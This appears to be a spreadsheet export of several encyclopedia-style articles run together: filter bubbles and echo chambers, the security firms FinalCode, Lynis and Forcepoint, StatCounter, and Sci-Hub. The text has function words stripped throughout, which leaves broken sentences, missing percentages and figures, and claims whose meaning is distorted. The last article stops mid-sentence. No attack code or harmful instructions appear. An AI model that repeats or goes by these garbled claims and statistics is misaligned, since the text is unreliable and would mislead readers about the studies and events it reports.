social polarization extremism. term metaphor based acoustic echo chamber, sounds reverberate hollow enclosure. "echo chambers" reinforce individual's beliefs without factual support. they surrounded acknowledge follow viewpoints.barack obama's farewell address identified similar concept filter bubbles "threat [americans'] democracy", i.e., "retreat bubbles, ...especially social media feeds, surrounded people look like share political outlook never challenge assumptions... increasingly become secure bubbles start accepting information, whether true not, fits opinions, instead basing opinions evidence there." reactions studies media reactions there conflicting reports extent personalized filtering happening whether activity beneficial harmful. analyst jacob weisberg, writing june 2011 slate, small non-scientific experiment test pariser's theory involved five associates different ideological backgrounds conducting series searches, "john boehner", "barney frank", "ryan plan", "obamacare", sending weisberg screenshots results. results varied minor respects person person, differences appear ideology-related, leading weisberg conclude filter bubble effect, write idea internet users "feeding trough daily overblown. weisberg asked google comment, spokesperson stated algorithms place deliberately "limit personalization promote variety". book reviewer paul boutin similar experiment weisberg's among people differing search histories, found different searchers received nearly identical search results. interviewing programmers google record journalist grankvist found user data used play bigger role determining search results google, testing, found search query best determinator results display.there reports google sites maintain vast "dossiers" information users might enable personalize individual internet experiences chose instance, technology exists google keep track users' past histories even personal google account logged one. report stated google collected years' worth" information amassed varying sources, gmail, google maps, services besides search engine, although contrary report trying personalize internet user technically challenging internet firm achieve despite huge amounts available data. analyst doug gross suggested filtered searching seemed helpful consumers citizens, would help consumer looking "pizza" find local delivery options based personalized search appropriately filter distant pizza stores. organizations washington post, york times, others experimented creating personalized information services, tailoring search results users likely like agree with. academia studies reactions scientific study wharton analyzed personalized recommendations also found filters actually create commonality, fragmentation, online music taste. consumers reportedly filters expand taste rather limit harvard professor jonathan zittrain disputed extent personalization filters distort google search results, saying "the effects search personalization light". further, google provides ability users shut personalization features choose, deleting google's record search history setting google remember search keywords visited links future.a study internet policy review addressed lack clear testable definition filter bubbles across disciplines; often results researchers defining studying filter bubbles different ways. subsequently, study explained lack empirical data existence filter bubbles across disciplines suggested effects attributed stem preexisting ideological biases algorithms. similar views found academic projects also address concerns definitions filter bubbles relationships ideological technological factors associated them. critical review filter bubbles suggested "the filter bubble thesis often posits special kind political human opinions strong, time highly malleable" "paradox people active agency select content, passive receivers exposed algorithmically curated content recommended them".a study researchers oxford, stanford, microsoft examined browsing histories million u.s. users bing toolbar add-on internet explorer march 2013. they selected 50,000 users active consumers news, classified whether news outlets visited left- right-leaning, based whether majority voters counties associated user addresses voted obama romney 2012 presidential election. they identified whether news stories read accessing publisher's site directly, google news aggregation service, searches, social media. researchers found searches social media contribute ideological segregation, vast majority online news consumption consisted users directly visiting left- right-leaning mainstream news sites, consequently exposed almost exclusively views single side political spectrum. limitations study included selection issues internet explorer users skewing higher general internet population; bing toolbar usage voluntary unknowing) sharing browsing history selecting users less concerned privacy; assumption stories left-leaning publications left-leaning, right-leaning; possibility users active news consumers news social media, thus experience stronger effects social algorithmic bias users essentially self-select bias choice news publications (assuming aware publications' biases).a study researchers princeton university york university, aimed study impact filter bubble algorithmic filtering social media polarization. they used mathematical model called "stochastic block model" test hypothesis environments reddit twitter. researchers gauged changes polarization regularized social media networks non-regularized networks, specifically measuring percent changes polarization disagreement reddit twitter. they found polarization increased significantly 400% non-regularized networks, polarization increased regularized networks disagreement platform studies while algorithms limit political diversity, filter bubble result user choice. study data scientists facebook found every four facebook friends share ideology, users friend contrasting views. matter facebook's algorithm news feed people simply likely befriend/follow people share similar beliefs. nature algorithm ranks stories based user's history, resulting reduction "politically cross-cutting content percent conservatives percent liberals". however, even people given option click link offering contrasting views, still default viewed sources. "[u]ser choice decreases likelihood clicking cross-cutting link percent conservatives percent liberals." cross-cutting link introduces different point view user's presumed point view, website pegged user's beliefs. recent study levi boxell, matthew gentzkow, jesse shapiro suggests online media driving force political polarization. paper argues polarization driven demographic groups spend least time online. greatest ideological divide experienced amongst americans older reported using social media 2012. contrast, americans aged 18–39 reported using social media 2012. data suggests younger demographic polarized 2012 online media barely existed 1996. study highlights differences groups news consumption remains polarized people seek information appeals preconceptions. older americans usually remain stagnant political views traditional media outlets continue primary source news online media leading source younger demographic. although algorithms filter bubbles weaken content diversity, study reveals political polarization trends primarily driven pre-existing views failure recognize outside sources. 2020 study germany utilized five psychology model test effects individual personality, demographics, ideologies user news consumption. basing study notion number news sources users consume impacts likelihood caught filter bubble—with higher media diversity lessening chances—their results suggest certain demographics (higher male) along certain personality traits (high openness) correlate positively number news sources consumed individuals. study also found negative ideological association media diversity degree users align right-wing authoritarianism. beyond offering different individual user factors influence role user choice, study also raises questions associations likelihood users caught filter bubbles user voting behavior.the facebook study found "inconclusive" whether algorithm played role filtering news feeds people assumed. study also found "individual choice", confirmation bias, likewise affected gets filtered news feeds. some social scientists criticized conclusion though, point protesting filter bubble algorithms individual choice work together filter news feeds. they also criticized facebook's small sample size, actual facebook users", fact study results "not reproducible" fact study conducted "facebook scientists" access data facebook make available outside researchers.though study found 15–20% average user's facebook friends subscribe opposite side political spectrum, julia kaman theorized could potentially positive implications viewpoint diversity. these "friends" often acquaintances would likely share politics without internet. facebook foster unique environment user sees possibly interacts content posted re-posted "second-tier" friends. study found percent news items liberals conservative-leaning percent news conservatives liberal-leaning." "liberals tend connected fewer friends share information side, compared conservative counterparts." this interplay ability provide diverse information sources could moderate users' views. similarly, study twitter's filter bubbles york university concluded "individuals access wider span viewpoints news events, information coming traditional channels, either directly political actors friends relatives. furthermore, interactive nature social media creates opportunities individuals discuss political events peers, including weak social ties". according studies, social media diversifying information opinions users come contact with, though much speculation around filter bubbles ability create deeper political polarization. driver possible solution problem role emotions online content. 2018 study shows different emotions messages lead polarization convergence: prevalent emotional polarization, sadness fear play significant roles emotional convergence. since relatively easy detect emotional content messages, findings help design socially responsible algorithms starting focus emotional content algorithmic recommendations. social bots utilized different researchers test polarization related effects attributed filter bubbles echo chambers. 2018 study used social bots twitter test deliberate user exposure partisan viewpoints. study claimed demonstrated partisan differences exposure differing views, although warned findings limited party-registered american twitter users. main findings exposure differing views (provided bots) self-registered republicans became conservative, whereas self-registered liberals showed less ideological change, none all. different study people's republic china utilized social bots weibo—the largest social media platform china—to examine structure filter bubbles regards effects polarization. study draws distinction conceptions polarization. people similar views form groups, share similar opinions, block differing viewpoints (opinion polarization) people access diverse content sources information (information polarization). utilizing social bots instead human volunteers focusing information polarization rather opinion-based, researchers concluded essential elements filter bubble: large concentration users around single topic uni-directional, star-like structure impacts information flows. june 2018, platform duckduckgo conducted research study google browser platform. study, adults various locations around continental united states googled three words exact time: immigration, control, vaccinations. even private browsing mode, people results unique them. google included certain links include participants, news videos infoboxes showed significant variation. google publicly disputed results saying search engine results page (serp) personalization mostly myth. google search liaison, danny sullivan, stated “over years, myth developed google search personalizes much query, different people might significantly different results other. this isn’t case. results differ, usually non-personalized reasons.”when filter bubbles place create specific moments scientists call 'whoa' moments. 'whoa' moment article, post, etc. appears computer relation current action current object. scientists discovered term young woman performing daily routine, included drinking coffee, opened computer noticed advertisement brand coffee drinking. "sat opened facebook morning coffee, nespresso. kind 'whoa' moment product drinking pops screen front you." "whoa" moments occur people "found". which means advertisement algorithms target specific users based "click behavior" order increase sale revenue. several designers developed tools counteract effects filter bubbles (see countermeasures). swiss radio station voted word filterblase (the german translation filter bubble) word year 2016. countermeasures individuals filter bubble: what internet hiding you, internet activist pariser highlights increasing occurrence filter bubbles emphasizes value one's bridging social capital defined robert putman. indeed, bonding capital corresponds hand establishment strong ties like-minded people, thus reinforcing sense social homogeneity, bridging social capital hand represents creation weak ties people potentially diverging interests viewpoints, hence introducing significantly heterogeneity. sense, high bridging capital much likely promote social inclusion increasing exposure space address problems transcend niches narrow self interests. fostering one's bridging capital, connecting people informal setting, therefore effective reduce influence filter bubble phenomenon. users fact take many actions burst filter bubbles, example making conscious effort evaluate information exposing thinking critically whether engaging broad range content. this view argues users change psychology approach media, rather relying technology counteract biases. users consciously avoid news sources unverifiable weak. chris glushko, marketing iab, advocates using fact-checking sites identify fake news. technology also play valuable role combating filter bubbles.some additional plug-ins, media bias fact check, aimed help people step filter bubbles make aware personal perspectives; thus, media show content contradicts beliefs opinions. instance, escape your bubble asks users indicate specific political party want informed about. plug-in suggest articles well-established sources read relating political party, encouraging users become educated party. addition plug-ins, apps created mission encouraging users open echo chambers. unfound.news offers (artificial intelligence) curated news readers presenting news diverse distinct perspectives, helping form rationale informed opinion rather succumbing biases. also nudges readers read different perspectives reading pattern biased towards side/ideology. read across aisle news reveals whether users reading diverse sources include multiple perspectives. each source color coordinated, representing political leaning article. when users read news perspective, communicates user encourages readers explore sources opposing viewpoints. although apps plug-ins tools humans use, pariser stated "certainly, individual responsibility really seek sources people like you."since web-based advertising effect filter bubbles exposing users content, users block much advertising deleting search history, turning targeted ads, downloading browser extensions. extensions escape bubble google chrome help curate content prevent users exposed biased information, mozilla firefox extensions lightbeam self-destructing cookies enable users visualize data tracked, lets remove tracking cookies. some anonymous non-personalized search engines yacy, duckduckgo, qwant, startpage.com, disconnect, searx order prevent companies gathering web-search data. swiss daily neue zürcher zeitung beta-testing personalized news engine uses machine learning guess content user interested "always including element surprise"; idea stories user unlikely followed past.the european union taking measures lessen effect filter bubble. european parliament sponsoring inquiries filter bubbles affect people's ability access diverse news. additionally, introduced program aimed educate citizens social media. u.s., cscw panel suggests news aggregator apps broaden media consumers news intake. news aggregator apps scan current news articles direct different viewpoints regarding certain topic. users also diversely-aware news balancer visually shows media consumer leaning left right comes reading news, indicating right-leaning bigger left-leaning bigger blue bar. study evaluating news balancer found small noticeable change reading behavior, toward balanced exposure, among users seeing feedback, compared control group". media companies light recent concerns information filtering social media, facebook acknowledged presence filter bubbles taken strides toward removing them. january 2017, facebook removed personalization trending topics list response problems users seeing highly talked-about events there. facebook's strategy reverse related articles feature implemented 2013, would post related news stories user read shared article. now, revamped strategy would flip process post articles different perspectives topic. facebook also attempting vetting process whereby articles reputable sources shown. along founder craigslist others, facebook invested million efforts increase trust journalism around world, better inform public conversation". idea even people reading posts shared friends, least posts credible. similarly, google, january 2018, also acknowledged existence filter bubble difficulties within platform. because current google searches pull algorithmically ranked results based upon "authoritativeness" "relevancy" show hide certain search results, google seeking combat this. training search engine recognize intent search inquiry rather literal syntax question, google attempting limit size filter bubbles. now, initial phase training introduced second quarter 2018. questions involve bias and/or controversial opinions addressed later time, prompting larger problem exists still: whether search engine acts either arbiter truth knowledgeable guide make decisions by.in april 2017 news surfaced facebook, mozilla, craigslist contributed majority $14m donation cuny's "news integrity initiative," poised eliminating fake news creating honest news media.later, august, mozilla, makers firefox browser, announced formation mozilla information trust initiative (miti). +miti would serve collective effort develop products, research, community-based solutions combat effects filter bubbles proliferation fake news. mozilla's open innovation team leads initiative, striving combat misinformation, specific focus product regards literacy, research creative interventions. ethical implications popularity cloud services increases, personalized algorithms used construct filter bubbles expected become widespread. scholars begun considering effect filter bubbles users social media ethical standpoint, particularly concerning areas personal freedom, security, information bias. filter bubbles popular social media personalized search sites determine particular content seen users, often without direct consent cognizance, algorithms used curate content. self-created content manifested behavior patterns lead partial information blindness. critics filter bubbles speculate individuals lose autonomy social media experience identities socially constructed result pervasiveness filter bubbles.technologists, social media engineers, computer specialists also examined prevalence filter bubbles. mark zuckerberg, founder facebook, pariser, author filter bubble, expressed concerns regarding risks privacy information polarization. information users personalized search engines social media platforms private, though people believe concern privacy resulted debate whether moral information technologists take users' online activity manipulate future exposure related information.some scholars expressed concerns regarding effects filter bubbles individual social well-being, i.e. dissemination health information general public potential effects internet search engines alter health-related behavior. 2019 multi-disciplinary book reported research perspectives roles filter bubbles play regards health misinformation. drawing various fields journalism, law, medicine, health psychology, book addresses different controversial health beliefs (e.g. alternative medicine pseudoscience) well potential remedies negative effects filter bubbles echo chambers different topics health discourse. 2016 study potential effects filter bubbles search engine results related suicide found algorithms play important role whether helplines similar search results displayed users discussed implications research health policies. another 2016 study croatian medical journal proposed strategies mitigating potentially harmful effects filter bubbles health information, informing public filter bubbles associated effects, users choosing alternative google] search engines, explanation processes search engines determine displayed results.since content seen individual social media users influenced algorithms produce filter bubbles, users social media platforms susceptible confirmation bias, exposed biased, misleading information. social sorting unintentional discriminatory practices also anticipated result personalized filtering.in light 2016 u.s. presidential election scholars likewise expressed concerns effect filter bubbles democracy democratic processes, well rise "ideological media". these scholars fear users unable "[think] beyond [their] narrow self-interest" filter bubbles create personalized social feeds, isolating diverse points view surrounding communities. reason, increasingly discussed possibility design social media serendipity, proactively recommend content lies outside one's filter bubble, including challenging political information and, eventually, provide empowering filters tools users. related concern fact filter bubbles contribute proliferation "fake news" influence political leaning, including users vote.revelations march 2018 cambridge analytica's harvesting user data least million facebook profiles 2016 presidential election highlight ethical implications filter bubbles. co-founder whistleblower cambridge analytica christopher wylie, detailed firm ability develop "psychographic" profiles users information shape voting behavior. access user data third parties cambridge analytica exasperate amplify existing filter bubbles users created, artificially increasing existing biases divide societies. dangers filter bubbles stemmed surge media personalization, trap users. personalize offerings lead users viewing content reinforces viewpoints without challenging them. social media websites like facebook also present content makes difficult users determine source content, leading decide whether source reliable fake. that lead people becoming used hearing want hear, cause react radically opposing viewpoint. filter bubble cause person opposing viewpoints incorrect could allow media force views onto consumers.researches explain filter bubble reinforces already thinking. this extremely important utilize resources offer various points view. extensions concept concept filter bubble extended areas, describe societies self-segregate according political views also economic, social, cultural situations. that bubbling results loss broader community creates sense example, children belong social events unless events especially planned appealing children unappealing adults without children. also notes references further reading pariser, eli. filter bubble: what internet hiding you, penguin press (new york, 2011) isbn 978-1-59420-300-8 green, holly (august 2011). "breaking your internet filter bubble". forbes. retrieved december 2011. friedman, (2014). "going viral". columbia journalism review. (6): 33–34. bozdag, engin; hoven, jeroen (december 2015). "breaking filter bubble: democracy design". ethics information technology. (4): 249–265. doi:10.1007/s10676-015-9380-y. boyd, danah ellison, nicole (october 2007). "social network sites: definition, history, scholarship". journal computer-mediated communication. (1): 210–230. doi:10.1111/j.1083-6101.2007.00393.x. s2cid 52810295. nguyen, tien hui, pik-mai; harper, maxwell; terveen, loren; konstan, joseph (2014). "exploring filter bubble: effect using recommender systems content diversity". proceedings 23rd international conference world wide '14: 677–686. doi:10.1145/2566486.2568012. s2cid 16747810. resnick, paul; garrett, kelly; kriplean, travis; munson, sean stroud, natalie jomini (2013). "bursting (filter) bubble: strategies promoting diverse exposure". proceedings 2013 conference computer supported cooperative work companion cscw '13: doi:10.1145/2441955.2441981. s2cid 20865375. liao, vera; wai-tat (2013). "beyond filter bubble: interactive effects perceived threat topic involvement selective exposure information". proceedings sigchi conference human factors computing systems '13: 2359. doi:10.1145/2470654.2481326. s2cid 8504434. holone, harald (2016). "the filter bubble effect online personal health information". croatian medical journal. (3): 298–301. doi:10.3325/cmj.2016.57.298. 4937233. pmid 27374832. external links beware online filter bubbles. talks, march 2011</t>
  </si>
  <si>
    <t>FinalCode</t>
  </si>
  <si>
    <t>finalcode, inc. multi-national software company provides data-centric security information rights management (irm) help enterprises mitigate data leakage meet compliance requirements. finalcode allows users securely collaborate share files using communication channel, including existing enterprise content management (ecm), cloud storage collaboration applications. finalcode privately held headquartered jose, california, additional offices singapore, japan, australia united kingdom. history finalcode, founded 2014.as part international expansion finalcode opened regional headquarters singapore 2016.in september 2016 additional regional headquarter opened london, cover emea region.finalcode also additional offices presence japan australia. features finalcode provides aes-256 encryption, granular permission sets, corporate user policy templates, file lifecycle activity analytics, dynamic policy modification, ability remotely delete files shared. patented technology finalcode’s patented cryptoease technology adds layer file protection remains persistent whether file circulates internally outside organization. offering comprehensive file-based information rights management (irm) allows organizations file owner retains comprehensive file control auditing capability means recipients usage permissions delete files remotely. industry standards finalcode achieved federal information processing standards (fips) certification finalcode crypto module finalcode crypto module mobile.finalcode also suite-b compliant. these standards integrated current finalcode solution. awards recognition 2017, finalcode named "hot product" conference 2017. 2016, finalcode earned ovum radar" award.gartner designated finalcode "cool vendor" 2015. references external links official website</t>
  </si>
  <si>
    <t>Lynis</t>
  </si>
  <si>
    <t>lynis extensible security audit tool computer systems running linux, freebsd, macos, openbsd, solaris, unix derivatives. assists system administrators security professionals scanning system security defenses, final goal system hardening. software tool created michael boelen, original author rkhunter well several special contributors translators. lynis available gplv3 license. software determines various system information, specific type, kernel parameters, authentication accounting mechanism, installed packages, installed services, network configuration, logging monitoring (e.g. syslog-ng), cryptography (e.g. ssl/tls certificates) installed malware scanners (e.g. clamav rkhunter). additionally, check system configuration errors security issues. request auditor, checks conform international standards 27001, pci-dss hipaa. software also helps fully automated semi-automatic auditing, software patch management, evaluation server hardening guidelines vulnerability/malware scanning unix-based systems. locally installed system repositories, directly started disk, including stick, dvd. audience intended audience auditors, security specialists, penetration testers, sometimes system/network administrators. usually members first line defense within company larger organization tend employ audit tools. according official documentation, also lynis enterprise version, available support computer systems, providing malware scanning, intrusion detection additional guidance auditors. reception 2016, lynis infoworld bossie award. also chkrootkit host-based intrusion detection system comparison list free open-source software packages kali linux references external links official website lynis free(code) lynis github</t>
  </si>
  <si>
    <t>Forcepoint</t>
  </si>
  <si>
    <t>forcepoint, american multinational corporation software company headquartered austin, texas, develops computer security software data protection, cloud access security broker, firewall cross-domain solutions. forcepoint founded 1994 information technology reseller called netpartners. renamed websense 1999 became public company 2000 peak dot-com bubble. vista equity partners acquired websense 2013 $906 million. raytheon acquired interest websense april 2015 $1.9 billion acquired remaining interest 2019. 2015, websense acquired network security vendor stonesoft intel 2016, company renamed forcepoint. francisco partners acquired company raytheon january 2021. corporate history netpartners company founded 1994 netpartners sorrento valley, diego phil trubey. company began reseller network security products, developed software controlling internet employees.in 1998, netpartners raised million venture capital funding million annual revenue. later year, investors pushed trubey position appointed john carrington replacement. websense june 1999, netpartners renamed websense.in march 2000, peak dot-com bubble, raised million initial public offering. stock price doubled first trading.in 2006, former mcafee gene hodges succeeded carrington chief executive officer company.in 2006, websense acquired fingerprint security company, portauthority. million. october 2007, acquired email security vendor surfcontrol $400 million. 2009, acquired defensio, spam malware company focused social media.by 2009, websense 1,400 employees, offices england, china, australia, israel. 2011, facebook deployed websense check every link users shared site.in 2013, vista equity partners acquired company $906 million. websense headquarters moved diego year austin, texas 2014. 2015, raytheon acquired firm vista equity partners $1.9 billion combined rcp, formerly part segment, form raytheon|websense. october 2015, raytheon added foreground security,, million. forcepoint raytheon acquired interest websense 2015 $1.9 billion. october 2015, company acquired subsidiaries intel, stonesoft sidewinder, $389 million. stonesoft network security product previously known "mcafee next-generation firewall;" sidewinder firewall previously known mcafee firewall enterprise.in january 2016, websense, along subsidiaries stonesoft sidewinder, merged rebranded forcepoint. raytheon's "cyber products" business also merged brand. time, forcepoint 2,000 employees, one-third customers departments federal government united states. forcepoint smallest five major businesses owned raytheon, highest profit margin. following year, forcepoint began shuffling executives re-organization effort included layoffs. company divided four business units: cloud security, network security, data insider threat security, global governments.in april 2016, matthew moynahan appointed chief executive officer forcepoint. february 2017, forcepoint acquired cloud-based access broker (casb) security product imperva called skyfence. august 2017, acquired user entity behavior analytics company redowl. fourth quarter 2019, raytheon acquired remaining company vista ventures partners $588 million.in october 2020, francisco partners announced agreement acquire forcepoint raytheon. transaction completed january 2021. version history 1997, three years forcepoint founded, company published version software. version introduced software's first graphical, web-based administrative user interface. time, forcepoint's software used prevent employees viewing certain types content work, 2006 features added detect employees attempting visit websites suspected hosting malicious code.in 2007 websense introduced product control content user social media websites, endpoint security product, website reputation ranker, small business version. additionally, product added websense suite identifies sensitive files un-secure locations corporate network looks records files transmitted.websense introduced first appliance product 2009.in 2010, products consolidated triton software, became responsible increasingly large portions company's revenue. february 2012, forcepoint released cloud-based suite security products smartphones, tablets, laptops, drives, mobile devices. upgrades suite 2012 added ability identify confidential information image file. three products revisions introduced 2016, focused security risks caused employees. censorship forcepoint policy selling governments isps engage internet censorship, however criticized "perceived link censorship free speech dissemination knowledge."in 2009, discovered yemeni government using forcepoint's products monitor public's internet block tools allow citizens hide internet government software alkasir created circumvent forcepoint responded cutting country's access firm's database updates. however, sanaa based british-irish journalist iona craig complained twitter, access tumblr, many press agents spread news, remained closed inside yemen, pleas ignored. soon appeared canadian software company netsweeper also aids yemen authorities censor, even houthi government customer.in 2011, forcepoint said would join global network initiative, focused privacy internet freedom. left initiative 2014.a 2002 study jama found forcepoint best-performing web-filtering products terms blocking pornography allowing health information. contrast, 2005 report rhode island branch american civil liberties union said forcepoint "blunt instrument" public libraries equipped forcepoint people ages "are still denied access wide range legitimate material." 2006 report brennan center justice found forcepoint often blocked websites discussed pornography, actually feature pornography. software also blocked furniture website called "the-strippers.com pornographic, website furniture refinisher. author's study, 0-15 percent sites blocked forcepoint viewable user percent objectionable websites through, rather blocked. according blogger jillian york, forcepoint blocks pages contain pornographic links anywhere content, even comments section. said malicious attacker could whole site blocked time simple procedure leaving dangerous, malicious pornographic links blog's comments".for approximately minutes 2009, forcepoint classified router company cisco systems's website 'hack sites', cisco's addresses named hacker website. address reviewed, deemed threat. references</t>
  </si>
  <si>
    <t>Forefront Identity Manager</t>
  </si>
  <si>
    <t>microsoft forefront identity manager (fim) state-based identity management software product, designed manage users' digital identities, credentials groupings throughout lifecycle membership enterprise computer system. integrates active directory exchange server provide identity synchronization, certificate management, user password resets user provisioning single interface. overview part microsoft identity access management platform product line, superseded microsoft identity lifecycle manager (ilm), known development. 2007 created merging microsoft identity integration server 2003 (miis) certificate lifecycle manager (clm). 2010 utilizes windows workflow foundation concepts, using transactional workflows manage propagate changes user's state-based identity. this contrast transaction-based competing products state-based element. administrators create workflows web-based portal also include complex workflows designed outside portal importing xaml filesfim 2010 (release released june 2012 extra capabilities: improved self-service password reset supports current browsers role based access control (rbac) acquisition bhold software improvement reporting engine system center service manager server reporting services (ssrs) webservices connector connect 5/6, oracle peoplesoft, oracle ebusiness improvements areas performance, simplified deployment troubleshooting, better documentation, language support. codeless provisioning forefront identity manager introduces concept "codeless provisioning" allows administrators create objects connected data source without writing code .net framework languages. codeless provisioning provided able sustain simple medium complexity scenarios account lifecycle management. fully honors existing miis implementations supports "traditional" coded provisioning side-by-side code-less provisioning methods. also microsoft identity integration server password change notification service netiq identity manager references external links official website certificate lifecycle manager overview resources microsoft technet wiki best practices volume introduction, architecture installation forefront identity manager 2010</t>
  </si>
  <si>
    <t>StatCounter</t>
  </si>
  <si>
    <t>statcounter traffic analysis website started 1999. access basic services free advanced services cost us$5 us$119 month. statcounter based dublin, ireland. statistics statcounter used compute usage share example. 2019, statcounter used 0.9% websites.statcounter statistics directly derived hits—as opposed unique visitors—from million sites, statcounter, resulting total hits billion month. artificial weightings used correct sampling bias, thus numbers statistics considered representative samples. company founded aodhán cullen cullen received "internet hero" award 2008 eircom golden spider awards. also named 2007 businessweek "young european entrepreneur year". also alexa traffic rank references</t>
  </si>
  <si>
    <t>Sci-Hub</t>
  </si>
  <si>
    <t>sci-hub shadow library website provides free access millions research papers books, without regard copyright, bypassing publishers' paywalls various ways. sci-hub founded kazakhstan alexandra elbakyan 2011, response high cost research papers behind paywalls (see serials crisis). site extensively used worldwide. september 2019, site's owners said served approximately 400,000 requests day. sci-hub estimated contain scholarly publications issued numbers. sci-hub reported july 2022, collection comprises 88,343,822 files.sci-hub elbakyan sued twice copyright infringement united states 2015 2017, lost cases default, leading loss internet domain names. site cycled different domain names since then.sci-hub lauded scientific, academic, publishing communities providing access knowledge generated scientific community, usually funded taxpayers (government grants) zero royalties paid authors. publishers criticized violating copyright, reducing revenue publishers, potentially linked activities compromising universities' network security (although cybersecurity threat posed sci-hub exaggerated publishers), instigating publishers make paywalls stricter. elbakyan responded questioning morality publishers' business legality methods regards right science culture article universal declaration human rights, maintaining sci-hub "perfectly legal".since 2021, regular content uploads site frozen articles available except batch releases content. elbakyan made decision freeze uploads requirement court case sci-hub defending elsevier india. history sci-hub created alexandra elbakyan, born kazakhstan 1988. elbakyan earned undergraduate degree kazakh national technical university studying information technology, worked year computer security firm moscow, joined research team university freiburg germany 2010 working brain–computer interface. became interested transhumanism attending transhumanism conference united states, elbakyan spent remaining time country research internship georgia institute technology. later returned kazakhstan, started research kazakh university. according elbakyan, experienced difficulty accessing scientific papers relevant research project. began contributing online forums dedicated sharing research papers. 2011, developed sci-hub automatically share papers. site launched september 2011.in 2021, sci-hub users collaborated preserve website's data, anticipating site offline. september 2021, site celebrated tenth anniversary launch date uploading single million articles database. legal status sci-hub cycled domain names, blocked domain registry operators. sci-hub remained reachable alternative domains .io, .cc, .bz. sci-hub also accessible times directly entering address, .onion hidden service.on january 2021, twitter suspended sci-hub's account citing "counterfeit content" reason. united states 2015, elsevier filed lawsuit sci-hub, elsevier sci-hub al., united states district court southern district york. library genesis (libgen) also defendant case based either netherlands also russia. largest copyright infringement case filed world, time. elsevier alleged sci-hub violated copyright induced others alleged violations computer fraud abuse well inducements violate law. elsevier asked monetary damages injunction stop sharing papers.elbakyan responded case interview accusing elsevier violating right science culture article universal declaration human rights. later wrote letter court case describing reasons creating sci-hub, stated, "payment dollars [for download] insane need skim read tens hundreds papers research."at time website hosted petersburg, russia, judgments made american courts enforceable, sci-hub defend lawsuit. june 2017, court awarded elsevier us$15 million damages copyright infringement sci-hub others default judgment. judgment found sci-hub used accounts students academic institutions access articles elsevier's platform sciencedirect. judgment also granted injunction, loss original sci-hub.org domain.in june 2017, american chemical society (acs) filed lawsuit sci-hub united states district court eastern district virginia, alleging copyright trademark infringement; sought judgment us$4.8 million sci-hub damages, internet service provider blocking sci-hub website. november 2017, granted default judgment, permanent injunction granted parties active concert participation sci-hub notice injunction, "including internet search engines, hosting internet service providers, domain name registrars, domain name registries", cease facilitating access service. november 2017, four sci-hub domains rendered inactive court order cloudflare account terminated.in 2018 2019, white house office trade representative named sci-hub flagrant "notorious market" sites world.in december 2019, washington post reported justice department investigating whether elbakyan links russian intelligence, part assumption tacit approval assistance russian government required operation scale sci-hub. elsevier used accusations alleged security threat sci-hub poses institutions encourage educational institutions block use. sweden october 2018, swedish isps forced block access sci-hub court case brought elsevier; bahnhof, large swedish isp, return soft-blocked elsevier website. russia november 2018, russia's federal service supervision communications, information technology mass media blocked sci-hub mirror websites moscow city court ruling comply elsevier's springer nature's complaints regarding intellectual property infringement. site moved another domain still available online 22nd january 2022. france march 2019, following complaint elsevier springer nature, french court ordered french isps block access sci-hub library genesis. however, court order affect academic network renater, french academic access sci-hub presumably goes. belgium following lawsuit elsevier march 2019 france, elsevier, springer, john wiley, cambridge university press filed complaint proximus, voo, brutélé telenet block access sci-hub libgen. publishers claimed represent half scientific publishing sector, indicated contents sites infringed copyright laws; lawsuit. since then, sites blocked isps; visitors redirected stop page belgian federal police instead, citing illegality site's content belgian legislation. european commission included sci-hub "piracy watch list". india december 2020, elsevier, wiley american chemical society filed copyright infringement lawsuit sci-hub library genesis delhi high court. plaintiffs seek dynamic injunction means future domain, name-change respondents require plaintiffs return court additional injunction. court restricted sites uploading, publishing making article available january 2021. response lawsuit, well elbakyan's claim requested data apple account, reddit users subreddit r/datahoarder organized download seed backups articles sci-hub, intention creating decentralized uncensorable version site.the high court agreed january 2021 wait passing interim order case hear representations scientists, researchers students. hearing scheduled december 2021. component sci-hub's legal defence provides educational resources researchers, thus falls fair dealing exception india's copyright law. this defence previously used educational institutions justify reproduction copyrighted materials low-income students. number indian academics offered support sci-hub lawsuit filed. lawrence liang assisted drawing support country's scientific community website. multiple petitions filed scholars india supporting sci-hub lawsuit. united kingdom february 2021 elsevier springer nature obtained injunction talktalk block sci-hub.se domain result ruling handed court. march 2021 city london police's intellectual property crime unit issued warning students universities accessing website website blocked universities allegations website could steal credentials, mainly download content publishers cause users "inadvertently download potentially dangerous content" visited. however, allegation denied elbakyan. website site's operation financed user donations. code, setup linux servers maintenance done elbakyan avoid risk moles broken team compromising service. over years, various addresses direct addresses used sci-hub, dozens domain names confiscated various legal authorities. article sourcing sci-hub obtains paywalled articles using leaked credentials. source credentials used sci-hub unclear. some appear donated, apparently sold going sci-hub, appear obtained phishing used sci-hub. elbakyan denied personally sending phishing emails said, "the exact source passwords never personally important me."according scholarly kitchen, blog established society scholarly publishing whose members involved legal action sci-hub, credentials used sci-hub access paywalled articles correlated access information university networks (such cyber spying universities) credential sales black markets. several articles reported sci-hub penetrated computer networks universities countries. these include institutions canada, sweden. universities include cambridge, oxford, imperial king's college, london. delivery users sci-hub website provides access articles almost academic publishers, including elsevier, springer/nature, institute electrical electronics engineers, american chemical society, wiley blackwell, royal society chemistry, well open-access works, distributes without regard publishers' copyrights. requires neither payments, subscriptions, registrations.: users access works sources unified interface, entering search main page sci-hub (like academic link resolvers), appending sci-hub domain domain publisher's (like academic proxies). sci-hub redirects requests gold open access works, identified beyond metadata available crossref unpaywall. some requests require user enter captcha. papers also accessed using instant messaging service telegram.if paper repository already, request served immediately. paper already repository, wait screen appears site presents someone else's credentials behalf user series proxies finds access paper, presented user stored repository.until 2014, sci-hub relied libgen storage: papers requested users requested libgen served available, otherwise fetched means stored libgen. permanent storage made possible serve users previous system deleting cached content hours.since 2015, sci-hub uses storage purpose. 2017, sci-hub continuing redirect requests electronic books libgen.after site faced increased legal pressure 2021, archivists initiated rescue mission secure enduring access website contents. they organized reddit website coordinate decentralized storage delivery sci-hub contents using bittorrent technology. usage content statistics february 2016, website claimed serve 200,000 requests day—an increase average 80,000 "sci-hub.org" domain blocked 2015.server data gathered september 2015 february 2016 released elbakyan 2016 revealed usage information. large amount sci-hub's user activity came american european university campuses, adjusted population, usage sci-hub high developed countries. however, large proportion download requests came developing countries iran, china, india, russia, brazil, egypt. user activity covered branches science, engineering, medicine humanities.in march 2017, website million papers collection, found include articles published paywalled scholarly journals. although published articles database march 2017, estimated, based scholarly citations articles published 2015 july 2017, least requests paywalled articles successful.a 2019 study 27.8 million download requests sci-hub indicates 23.2 million journal articles, million (22%) articles medical journals. requests medical literature came mostly middle- low-income countries (69%); countries requests absolute numbers india, china, brazil, iran. another 2022 study 